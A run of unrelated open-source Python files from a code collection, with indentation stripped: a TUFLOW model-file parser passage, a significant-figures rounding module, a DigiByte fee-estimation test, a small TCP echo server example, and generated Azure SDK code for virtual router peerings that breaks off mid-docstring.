raise ValueError("filepart doesn't seem to exist in UserVariables.")
# Delete the old one and call add() with the new one
if temp_name == 's' or temp_name == 's1':
if 's' in self.scenario.keys():
del self.scenario['s']
del self.variable['e']
if 's1' in self.scenario.keys():
del self.scenario['s1']
del self.variable['e1']
self.add(filepart, 'scenario')
if temp_name == 'e' or temp_name == 'e1':
if 'e' in self.scenario.keys():
del self.event['e']
del self.variable['e']
if 'e1' in self.scenario.keys():
del self.event['e1']
del self.variable['e1']
self.add(filepart, 'event')
else:
del self.variable[temp_name]
self.add(filepart)
def variablesToDict(self):
"""Get the values of the variables.
Note that, like tuflow, scenario and event values will be includes in
the variables dict returned.
{'name1': var1, 'name2': var2, 'nameN': name2}
Return:
dict - with variables names as key and values as values.
"""
out = {}
for vkey, vval in self.variable.items():
out[vkey] = vval.variable
return out
def seValsToDict(self):
"""Get the values of the scenario and event variables.
Returns the currently active scenario and event values only - not the
placeholder keys - in a dictionary in the format::
{'scenario': [val1, val2, valN], 'event': [val1, val2, valN]}
Return:
dict - of scenario and event values.
"""
scenario = [s.variable for s in self.scenario.values()]
event = [e.variable for e in self.event.values()]
return {'scenario': scenario, 'event': event}
def remove(self, key):
"""Remove the variable stored at the given key.
Args:
key(str): key for either the scenario, event, or variables dict.
"""
if key in self.scenario.keys():
self._names.remove(self.scenario[key]._variable_name)
del self.scenario[key]
if key in self.event.keys():
self._names.remove(self.scenario[key]._variable_name)
del self.event[key]
if key in self.variable.keys():
self._names.remove(self.scenario[key]._variable_name)
del self.variable[key]
def get(self, key, vtype=None):
"""Return the TuflowPart at the given key.
Args:
key(str): the key associated with the required TuflowPart.
vtype=None(str): the type of part to return. If None it will return
a 'variable' type. Other options are 'scenario' and 'event'.
Return:
TuflowPart - TuflowModelVariable or TuflowUserVariable type.
"""
if vtype == 'scenario':
if not key in self.scenario.keys():
raise KeyError('key %s is not in scenario keys' % key)
return self.scenario[key]
elif vtype == 'event':
if not key in self.event.keys():
raise KeyError('key %s is not in event keys' % key)
return self.event[key]
else:
if not key in self.variable.keys():
raise KeyError('key %s is not in variable keys' % key)
return self.variable[key]
class TuflowFilepartTypes(object):
"""Contains key words from Tuflow files for lookup.
This acts as a lookup table for the TuflowLoader class more than anything
else. It is kept here as that seems to be most sensible.
Contains methods for identifying whether a command given to it is known
to the library and what type it is. i.e. what UNIT_CATEGORY it falls into.
"""
def __init__(self):
"""Initialise the categories and known keywords"""
self.ambiguous = {
'WRITE CHECK FILES': [
['WRITE CHECK FILES INCLUDE', fpt.VARIABLE],
['WRITE CHECK FILES EXCLUDE', fpt.VARIABLE]
],
# 'WRITE CHECK FILES INCLUDE': ['WRITE CHECK FILES', fpt.RESULT],
# 'WRITE CHECK FILES EXCLUDE': ['WRITE CHECK FILES', fpt.RESULT],
'DEFINE EVENT': [['DEFINE OUTPUT ZONE', fpt.SECTION_LOGIC]],
'DEFINE OUTPUT ZONE': [['DEFINE EVENT', fpt.EVENT_LOGIC]],
# 'START 1D DOMAIN': ['START 2D DOMAIN', fpt.SECTION_LOGIC],
# 'START 2D DOMAIN': ['START 1D DOMAIN', fpt.SECTION_LOGIC],
}
self.ambiguous_keys = self.ambiguous.keys()
self.types = {}
self.types[fpt.MODEL] = [
'GEOMETRY CONTROL FILE', 'BC CONTROL FILE',
'READ GEOMETRY CONTROL FILE', 'READ BC CONTROL FILE',
'READ FILE', 'ESTRY CONTROL FILE',
'EVENT FILE'
]
self.types[fpt.RESULT] = [
'OUTPUT FOLDER', 'WRITE CHECK FILES', 'LOG FOLDER'
]
self.types[fpt.GIS] = [
'READ MI', 'READ GIS', 'READ GRID', 'SHP PROJECTION',
'MI PROJECTION'
]
self.types[fpt.DATA] = ['READ MATERIALS FILE', 'BC DATABASE']
self.types[fpt.VARIABLE] = [
'START TIME', 'END TIME', 'TIMESTEP', 'SET IWL',
'MAP OUTPUT INTERVAL', 'MAP OUTPUT DATA TYPES', 'CELL WET/DRY DEPTH',
'CELL SIDE WET/DRY DEPTH', 'SET IWL', 'TIME SERIES OUTPUT INTERVAL',
'SCREEN/LOG DISPLAY INTERVAL', 'CSV TIME', 'START OUTPUT',
'OUTPUT INTERVAL', 'STRUCTURE LOSSES', 'WLL APPROACH',
'WLL ADJUST XS WIDTH', 'WLL ADDITIONAL POINTS',
'DEPTH LIMIT FACTOR', 'CELL SIZE', 'SET CODE', 'GRID SIZE (X,Y)',
'SET ZPTS', 'SET MAT', 'MASS BALANCE OUTPUT', 'GIS FORMAT',
'MAP OUTPUT FORMATS', 'END MAT OUTPUT', 'ASC START MAP OUTPUT',
'ASC END MAP OUTPUT', 'XMDF MAP OUTPUT DATA TYPES',
'WRITE PO ONLINE', 'ASC MAP OUTPUT DATA TYPES',
'WRITE CHECK FILES INCLUDE', 'WRITE CHECK FILES EXCLUDE',
'STORE MAXIMUMS AND MINIMUMS'
]
self.types[fpt.IF_LOGIC] = [
'IF SCENARIO', 'ELSE IF SCENARIO', 'IF EVENT',
'ELSE IF EVENT', 'END IF', 'ELSE'
]
self.types[fpt.EVENT_LOGIC] = ['DEFINE EVENT', 'END DEFINE']
self.types[fpt.SECTION_LOGIC] = ['DEFINE OUTPUT ZONE', 'END DEFINE']
self.types[fpt.DOMAIN_LOGIC] = [
'START 1D DOMAIN', 'END 1D DOMAIN', 'START 2D DOMAIN',
'END 2D DOMAIN'
]
self.types[fpt.USER_VARIABLE] = ['SET VARIABLE']
self.types[fpt.EVENT_VARIABLE] = [
'BC EVENT TEXT', 'BC EVENT NAME',
'BC EVENT SOURCE',
]
self.types[fpt.MODEL_VARIABLE] = ['MODEL SCENARIOS', 'MODEL EVENTS', ]
def find(self, find_val, file_type='*'):
"""Checks if the given value is known or not.
The word to look for doesn't have to be an exact match to the given
value, it only has to start with it. This means that we don't need to
know whether it is a 'command == something' or just 'command something'
(like: 'Estry Control File Auto') at this point.
This helps to avoid unnecessary repitition. i.e. many files are like:
'READ GIS' + another word. All of them are GIS type files so they all
get dealt with in the same way.
In some edge cases there are command that start the same. These are
dealt with by secondary check to see if the next character is '=' or
not.
Args:
find_val (str): the value attempt to find in the lookup table.
file_type (int): Optional - reduce the lookup time by providing
the type (catgory) to look for the value in. These are the
constants (MODEL, GIS, etc).
Returns:
Tuple (Bool, int) True if found. Int is the class constant
indicating what type the value was found under.
"""
find_val = find_val.upper()
if file_type == '*':
for key, part_type in self.types.items():
found = [i for i in part_type if find_val.startswith(i)]
if found:
retval = key
if found[0] in self.ambiguous_keys:
retval = self._checkAmbiguity(found[0], find_val, key)
return True, retval
return (False, None)
else:
found = [i for i in self.types[file_type] if find_val.startswith(i)]
if found:
return True, file_type
return (False, None)
def _checkAmbiguity(self, found, find_val, key):
"""Resolves any ambiguity in the keys."""
f = find_val.replace(' ', '')
f2 = found.replace(' ', '') + '='
if f.startswith(f2):
return key
else:
alternatives = self.ambiguous[found]
for i, a in enumerate(alternatives):
if find_val.startswith(a[0]):
return self.ambiguous[found][i][1]
return key
| duncan-r/SHIP | ship/tuflow/tuflowmodel.py | Python | mit | 22,689 |
from math import floor, log10
def round_(x, n):
"""Round a float, x, to n significant figures.
Caution should be applied when performing this operation.
Significant figures are an implication of precision; arbitrarily
truncating floats mid-calculation is probably not Good Practice in
almost all cases.
Rounding off a float to n s.f. results in a float. Floats are, in
general, approximations of decimal numbers. The point here is that
it is very possible to end up with an inexact number:
>>> roundsf(0.0012395, 3)
0.00124
>>> roundsf(0.0012315, 3)
0.0012300000000000002
Basically, rounding in this way probably doesn't do what you want
it to.
"""
n = int(n)
x = float(x)
if x == 0: return 0
e = floor(log10(abs(x)) - n + 1) # exponent, 10 ** e
shifted_dp = x / (10 ** e) # decimal place shifted n d.p.
return round(shifted_dp) * (10 ** e) # round and revert
def string(x, n):
"""Convert a float, x, to a string with n significant figures.
This function returns a decimal string representation of a float
to a specified number of significant figures.
>>> create_string(9.80665, 3)
'9.81'
>>> create_string(0.0120076, 3)
'0.0120'
>>> create_string(100000, 5)
'100000'
Note the last representation is, without context, ambiguous. This
is a good reason to use scientific notation, but it's not always
appropriate.
Note
----
Performing this operation as a set of string operations arguably
makes more sense than a mathematical operation conceptually. It's
the presentation of the number that is being changed here, not the
number itself (which is in turn only approximated by a float).
"""
n = int(n)
x = float(x)
if n < 1: raise ValueError("1+ significant digits required.")
# retrieve the significand and exponent from the S.N. form
s, e = ''.join(( '{:.', str(n - 1), 'e}')).format(x).split('e')
e = int(e) # might as well coerce now
if e == 0:
# Significand requires no adjustment
return s
s = s.replace('.', '')
if e < 0:
# Placeholder zeros need creating
return ''.join(('0.', '0' * (abs(e) - 1), s))
else:
# Decimal place need shifting
s += '0' * (e - n + 1) # s now has correct s.f.
i = e + 1
sep = ''
if i < n: sep = '.'
if s[0] is '-': i += 1
return sep.join((s[:i], s[i:]))
def scientific(x, n):
"""Represent a float in scientific notation.
This function is merely a wrapper around the 'e' type flag in the
formatting specification.
"""
n = int(n)
x = float(x)
if n < 1: raise ValueError("1+ significant digits required.")
return ''.join(('{:.', str(n - 1), 'e}')).format(x)
def general(x, n):
"""Represent a float in general form.
This function is merely a wrapper around the 'g' type flag in the
formatting specification.
"""
n = int(n)
x = float(x)
if n < 1: raise ValueError("1+ significant digits required.")
return ''.join(('{:#.', str(n), 'g}')).format(x)
| corriander/python-sigfig | sigfig/sigfig.py | Python | mit | 2,902 |
#!/usr/bin/env python3
# Copyright (c) 2009-2019 The Bitcoin Core developers
# Copyright (c) 2014-2019 The DigiByte Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test fee estimation code."""
from decimal import Decimal
import random
from test_framework.messages import CTransaction, CTxIn, CTxOut, COutPoint, ToHex, COIN
from test_framework.script import CScript, OP_1, OP_DROP, OP_2, OP_HASH160, OP_EQUAL, hash160, OP_TRUE
from test_framework.test_framework import DigiByteTestFramework
from test_framework.util import (
assert_equal,
assert_greater_than,
assert_greater_than_or_equal,
connect_nodes,
satoshi_round,
sync_blocks,
sync_mempools,
)
# Construct 2 trivial P2SH's and the ScriptSigs that spend them
# So we can create many transactions without needing to spend
# time signing.
REDEEM_SCRIPT_1 = CScript([OP_1, OP_DROP])
REDEEM_SCRIPT_2 = CScript([OP_2, OP_DROP])
P2SH_1 = CScript([OP_HASH160, hash160(REDEEM_SCRIPT_1), OP_EQUAL])
P2SH_2 = CScript([OP_HASH160, hash160(REDEEM_SCRIPT_2), OP_EQUAL])
# Associated ScriptSig's to spend satisfy P2SH_1 and P2SH_2
SCRIPT_SIG = [CScript([OP_TRUE, REDEEM_SCRIPT_1]), CScript([OP_TRUE, REDEEM_SCRIPT_2])]
def small_txpuzzle_randfee(from_node, conflist, unconflist, amount, min_fee, fee_increment):
"""Create and send a transaction with a random fee.
The transaction pays to a trivial P2SH script, and assumes that its inputs
are of the same form.
The function takes a list of confirmed outputs and unconfirmed outputs
and attempts to use the confirmed list first for its inputs.
It adds the newly created outputs to the unconfirmed list.
Returns (raw transaction, fee)."""
# It's best to exponentially distribute our random fees
# because the buckets are exponentially spaced.
# Exponentially distributed from 1-128 * fee_increment
rand_fee = float(fee_increment) * (1.1892 ** random.randint(0, 28))
# Total fee ranges from min_fee to min_fee + 127*fee_increment
fee = min_fee - fee_increment + satoshi_round(rand_fee)
tx = CTransaction()
total_in = Decimal("0.00000000")
while total_in <= (amount + fee) and len(conflist) > 0:
t = conflist.pop(0)
total_in += t["amount"]
tx.vin.append(CTxIn(COutPoint(int(t["txid"], 16), t["vout"]), b""))
if total_in <= amount + fee:
while total_in <= (amount + fee) and len(unconflist) > 0:
t = unconflist.pop(0)
total_in += t["amount"]
tx.vin.append(CTxIn(COutPoint(int(t["txid"], 16), t["vout"]), b""))
if total_in <= amount + fee:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount + fee, total_in))
tx.vout.append(CTxOut(int((total_in - amount - fee) * COIN), P2SH_1))
tx.vout.append(CTxOut(int(amount * COIN), P2SH_2))
# These transactions don't need to be signed, but we still have to insert
# the ScriptSig that will satisfy the ScriptPubKey.
for inp in tx.vin:
inp.scriptSig = SCRIPT_SIG[inp.prevout.n]
txid = from_node.sendrawtransaction(ToHex(tx), True)
unconflist.append({"txid": txid, "vout": 0, "amount": total_in - amount - fee})
unconflist.append({"txid": txid, "vout": 1, "amount": amount})
return (ToHex(tx), fee)
def split_inputs(from_node, txins, txouts, initial_split=False):
"""Generate a lot of inputs so we can generate a ton of transactions.
This function takes an input from txins, and creates and sends a transaction
which splits the value into 2 outputs which are appended to txouts.
Previously this was designed to be small inputs so they wouldn't have
a high coin age when the notion of priority still existed."""
prevtxout = txins.pop()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int(prevtxout["txid"], 16), prevtxout["vout"]), b""))
half_change = satoshi_round(prevtxout["amount"] / 2)
rem_change = prevtxout["amount"] - half_change - Decimal("0.00001000")
tx.vout.append(CTxOut(int(half_change * COIN), P2SH_1))
tx.vout.append(CTxOut(int(rem_change * COIN), P2SH_2))
# If this is the initial split we actually need to sign the transaction
# Otherwise we just need to insert the proper ScriptSig
if (initial_split):
completetx = from_node.signrawtransactionwithwallet(ToHex(tx))["hex"]
else:
tx.vin[0].scriptSig = SCRIPT_SIG[prevtxout["vout"]]
completetx = ToHex(tx)
txid = from_node.sendrawtransaction(completetx, True)
txouts.append({"txid": txid, "vout": 0, "amount": half_change})
txouts.append({"txid": txid, "vout": 1, "amount": rem_change})
def check_estimates(node, fees_seen):
"""Call estimatesmartfee and verify that the estimates meet certain invariants."""
delta = 1.0e-6 # account for rounding error
last_feerate = float(max(fees_seen))
all_smart_estimates = [node.estimatesmartfee(i) for i in range(1, 26)]
for i, e in enumerate(all_smart_estimates): # estimate is for i+1
feerate = float(e["feerate"])
assert_greater_than(feerate, 0)
if feerate + delta < min(fees_seen) or feerate - delta > max(fees_seen):
raise AssertionError("Estimated fee (%f) out of range (%f,%f)"
% (feerate, min(fees_seen), max(fees_seen)))
if feerate - delta > last_feerate:
raise AssertionError("Estimated fee (%f) larger than last fee (%f) for lower number of confirms"
% (feerate, last_feerate))
last_feerate = feerate
if i == 0:
assert_equal(e["blocks"], 2)
else:
assert_greater_than_or_equal(i + 1, e["blocks"])
class EstimateFeeTest(DigiByteTestFramework):
def set_test_params(self):
self.num_nodes = 3
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
"""
We'll setup the network to have 3 nodes that all mine with different parameters.
But first we need to use one node to create a lot of outputs
which we will use to generate our transactions.
"""
self.add_nodes(3, extra_args=[["-maxorphantx=1000", "-whitelist=127.0.0.1"],
["-blockmaxweight=68000", "-maxorphantx=1000"],
["-blockmaxweight=32000", "-maxorphantx=1000"]])
# Use node0 to mine blocks for input splitting
# Node1 mines small blocks but that are bigger than the expected transaction rate.
# NOTE: the CreateNewBlock code starts counting block weight at 4,000 weight,
# (68k weight is room enough for 120 or so transactions)
# Node2 is a stingy miner, that
# produces too small blocks (room for only 55 or so transactions)
def transact_and_mine(self, numblocks, mining_node):
min_fee = Decimal("0.00001")
# We will now mine numblocks blocks generating on average 100 transactions between each block
# We shuffle our confirmed txout set before each set of transactions
# small_txpuzzle_randfee will use the transactions that have inputs already in the chain when possible
# resorting to tx's that depend on the mempool when those run out
for i in range(numblocks):
random.shuffle(self.confutxo)
for j in range(random.randrange(100 - 50, 100 + 50)):
from_index = random.randint(1, 2)
(txhex, fee) = small_txpuzzle_randfee(self.nodes[from_index], self.confutxo,
self.memutxo, Decimal("0.005"), min_fee, min_fee)
tx_kbytes = (len(txhex) // 2) / 1000.0
self.fees_per_kb.append(float(fee) / tx_kbytes)
sync_mempools(self.nodes[0:3], wait=.1)
mined = mining_node.getblock(mining_node.generate(1)[0], True)["tx"]
sync_blocks(self.nodes[0:3], wait=.1)
# update which txouts are confirmed
newmem = []
for utx in self.memutxo:
if utx["txid"] in mined:
self.confutxo.append(utx)
else:
newmem.append(utx)
self.memutxo = newmem
def import_deterministic_coinbase_privkeys(self):
self.start_nodes()
super().import_deterministic_coinbase_privkeys()
self.stop_nodes()
def run_test(self):
self.log.info("This test is time consuming, please be patient")
self.log.info("Splitting inputs so we can generate tx's")
# Start node0
self.start_node(0)
self.txouts = []
self.txouts2 = []
# Split a coinbase into two transaction puzzle outputs
split_inputs(self.nodes[0], self.nodes[0].listunspent(0), self.txouts, True)
# Mine
while (len(self.nodes[0].getrawmempool()) > 0):
self.nodes[0].generate(1)
# Repeatedly split those 2 outputs, doubling twice for each rep
# Use txouts to monitor the available utxo, since these won't be tracked in wallet
reps = 0
while (reps < 5):
# Double txouts to txouts2
while (len(self.txouts) > 0):
split_inputs(self.nodes[0], self.txouts, self.txouts2)
while (len(self.nodes[0].getrawmempool()) > 0):
self.nodes[0].generate(1)
# Double txouts2 to txouts
while (len(self.txouts2) > 0):
split_inputs(self.nodes[0], self.txouts2, self.txouts)
while (len(self.nodes[0].getrawmempool()) > 0):
self.nodes[0].generate(1)
reps += 1
self.log.info("Finished splitting")
# Now we can connect the other nodes, didn't want to connect them earlier
# so the estimates would not be affected by the splitting transactions
self.start_node(1)
self.start_node(2)
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[0], 2)
connect_nodes(self.nodes[2], 1)
self.sync_all()
self.fees_per_kb = []
self.memutxo = []
self.confutxo = self.txouts # Start with the set of confirmed txouts after splitting
self.log.info("Will output estimates for 1/2/3/6/15/25 blocks")
for i in range(2):
self.log.info("Creating transactions and mining them with a block size that can't keep up")
# Create transactions and mine 10 small blocks with node 2, but create txs faster than we can mine
self.transact_and_mine(10, self.nodes[2])
check_estimates(self.nodes[1], self.fees_per_kb)
self.log.info("Creating transactions and mining them at a block size that is just big enough")
# Generate transactions while mining 10 more blocks, this time with node1
# which mines blocks with capacity just above the rate that transactions are being created
self.transact_and_mine(10, self.nodes[1])
check_estimates(self.nodes[1], self.fees_per_kb)
# Finish by mining a normal-sized block:
while len(self.nodes[1].getrawmempool()) > 0:
self.nodes[1].generate(1)
sync_blocks(self.nodes[0:3], wait=.1)
self.log.info("Final estimates after emptying mempools")
check_estimates(self.nodes[1], self.fees_per_kb)
if __name__ == '__main__':
EstimateFeeTest().main()
| digibyte/digibyte | test/functional/feature_fee_estimation.py | Python | mit | 11,548 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import SocketServer
import time
HOST = ''
PORT = 1234
ADDR = (HOST, PORT)
class MyRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
print('...connected from: {}'.format(self.client_address))
self.wfile.write('[{}] {}'.format(time.ctime(),
self.rfile.readline()))
if __name__ == '__main__':
tcpServ = SocketServer.TCPServer(ADDR, MyRequestHandler)
print('waiting fro connection...')
tcpServ.serve_forever()
| Furzoom/learnpython | app/test/TsTservSS.py | Python | mit | 553 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualRouterPeeringsOperations(object):
"""VirtualRouterPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from a Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
"""Gets the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouterPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualRouterPeering"]
"""Creates or updates the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:param parameters: Parameters supplied to the create or update Virtual Router Peering
operation.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualRouterPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeering]
